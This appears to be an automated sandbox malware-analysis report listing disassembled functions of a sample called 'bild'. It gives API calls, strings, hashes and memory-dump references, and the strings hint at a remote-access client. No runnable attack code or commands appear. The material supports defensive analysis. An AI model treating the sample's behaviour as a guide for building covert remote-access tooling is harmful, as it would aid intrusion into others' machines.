String ID: %s%s.bin$506407$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-764941068
Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65

Function 11144670 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
__strdup.LIBCMT ref: 111446A7

Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E

Part of subcall function 11144670: _free.LIBCMT ref: 111446CE

_free.LIBCMT ref: 111446DC

Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D

CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1

Function 1100ED70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2

Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836

_free.LIBCMT ref: 1100EDB4

Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D

_free.LIBCMT ref: 1100EDC7
_free.LIBCMT ref: 1100EDDA
_free.LIBCMT ref: 1100EDED

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91

Function 11145910 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB

wsprintfA.USER32 ref: 1114593E
wsprintfA.USER32 ref: 11145954

Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF

Strings

%sNSA.LIC, xrefs: 1114594E
%sNSM.LIC, xrefs: 11145938
NSM.LIC, xrefs: 11145923

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4

Function 11143230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
CloseHandle.KERNEL32(00000000), ref: 111432EF

Strings

", xrefs: 1114327E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750

Function 1102D0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,F3EE1E80,75922EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A

Strings

DisableGeolocation, xrefs: 1102D0FE
Client, xrefs: 1102D103

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 3315423714-4166767992
Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785

Function 110271B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA

Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4

TranslateMessage.USER32(?), ref: 110271F0
DispatchMessageA.USER32(?), ref: 110271F6

Strings

Exit Msgloop, quit=%d, xrefs: 1102722D

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1

Function 110173F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110173FD

Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101733C
Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0

Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017252
Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0

SetEvent.KERNEL32(00000318), ref: 1101741D
GetTickCount.KERNEL32 ref: 11017423

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1

Function 6C5D4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4
SetLastError.KERNEL32(00000078,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FED

Strings

EnumProcessModules, xrefs: 6C5D4FBE

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
Instruction ID: 1f45313c9618d1b82b77f5c4991c8e3b0a8d42ff715d9f74dc5a394723b8855a
Opcode Fuzzy Hash: 3deeab1da30d3f07ac4b2a6c84a5d200bbeb9be6aed09a2d8aaf89ea86d16981
Instruction Fuzzy Hash: 0AF05E76604318AFCB10DF99D844E5B77A8EB48722F00C91AF959D7A40C770E810CFA4

Function 6C5D5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
SetLastError.KERNEL32(00000078,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D503D

Strings

GetModuleFileNameExA, xrefs: 6C5D500E

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
Instruction ID: b668353775b84e478f8563f09fc45590e4c1a8c49a3114c32819ef85dfabe2bd
Opcode Fuzzy Hash: 1e7e6d1112b7d689346f8ced7c03a28a78f843e9126600e9452f300af91f2a1b
Instruction Fuzzy Hash: BCF05EB2A15318AFCB20CF98E844E5777B8EB48712F00491AF946D7A40C671F8108BE5

Function 111377F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D

CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835

Strings

*AutoICFConfig, xrefs: 11137807
Client, xrefs: 1113780C

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64

Function 11070C60 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 11070CB7
EnterCriticalSection.KERNEL32(?), ref: 11070CC4
LeaveCriticalSection.KERNEL32(?), ref: 11070D96

Strings

Push, xrefs: 11070C86

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91

Function 6C5DA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

